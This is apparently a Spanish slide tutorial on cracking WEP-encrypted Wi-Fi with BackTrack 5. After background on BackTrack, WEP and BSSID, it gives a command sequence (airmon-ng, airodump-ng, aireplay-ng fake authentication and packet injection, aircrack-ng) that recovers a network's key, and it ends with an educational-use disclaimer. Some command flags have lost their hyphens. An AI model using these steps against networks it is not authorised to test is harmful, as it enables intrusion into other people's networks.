You are on page 1of 17

SEGURIDAD WIFI WEP BACKTRACK 5

Eduardo Diaz maedudiaz@gmail.com

BACKTRACK

BackTrack es una distribucin GNU/Linux en formato LiveCD pensada y diseada para la auditora de seguridad y relacionada con la seguridad informtica en general. Actualmente tiene una gran popularidad y aceptacin en la comunidad que se mueve en torno a la seguridad informtica. Se deriva de la unin de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolucin del Whoppix (WhiteHat Knoppix), el cual pas a basarse en la distribucin Linux SLAX en lugar de Knoppix. La ltima versin de esta distribucin cambi el sistema base, antes basado en Slax y ahora en Ubuntu.1 Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de anlisis forense y herramientas para la auditora Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.2

WEP

WEP, acrnimo de Wired Equivalent Privacy o "Privacidad Equivalente a Cableado", es el sistema de cifrado incluido en el estndar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la informacin que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits (40 bits ms 24 bits del vector de iniciacin IV) o de 128 bits (104 bits ms 24 bits del IV). Los mensajes de difusin de las redes inalmbricas se transmiten por ondas de radio, lo que los hace ms susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad. Presentado en 1999, el sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada.

BSSID

En una red de rea local inalmbrica (WLAN), el BSSID (Basic Service Set Identifier) se trata de la direccin MAC (Media Access Control) formada por 48 bits (6 bloques hexadecimales), del Punto de acceso inalmbrico (Access Point, AP) al que nos conectamos. Si estamos conectados al AP, lo podremos obtener realizando un ping (paquetes ICMP) a la direccin IP de la puerta de enlace o gateway y a continuacin consultando la tabla ARP de nuestro equipo.

Estructura De La Presentacion

Comando

Funcion y Explicacion

Airmon-ng
Sirve para conocer el nombre de nuestras interfas de RED

Airmon-ng start wlan0

Sirve para colocar nuestra interfaz como monitor en este caso la interfaz Wlan0

Airodump-ng mon0
Nos sirve para escanear, las redes disponibles, dandonos datos importantes; los que mas nos interesan son * BSSID * CANAL * DATOS

Airodump-ng -w nombre c canal bssid Bssi mon0


-w donde vamos a guardar un archivo capturados -c nos indica el canal de la red --bssid Mac del acess point Esto nos servira para capturar datos. Por lo general de deben capturar minimo 30.000, por seguridad capturaremos 100.000 Este proceso es lento asi que ayudaremos un poco

Aireplay-ng -1 0 a bssid mon0

Este nos ayudara a autenticarnos de una forma falsa en la red

Aireplay-ng -3 b bssid mon0

Este nos permitir inyectar paquetes a la red asi ayudando a que suba el numero de paquetes capturados rpidamente. Luego esperamos que los datos capturados lleguen al numero deseado

Crtl + c

Cancelaremos Los Procesos De inyectar y Capturar Paquetes. Luego de alcanzar la cantidad de paquetes capturados deseada

ls

Para listar los archivos nos deber aparecer uno con el nombre (nombre -01.cap)

Aircrack-ng (nombre -01.cap)

Este nos enseara la password de la red

Las Herramientas Son Neutrales segn El Uso Que Le Demos ,Pueden Ser Benignas O Malignas.

No Le Hagas A Los Demas Lo Que No Quieres Que Te Hagan A Ti

Material Con Fines Educativos

You might also like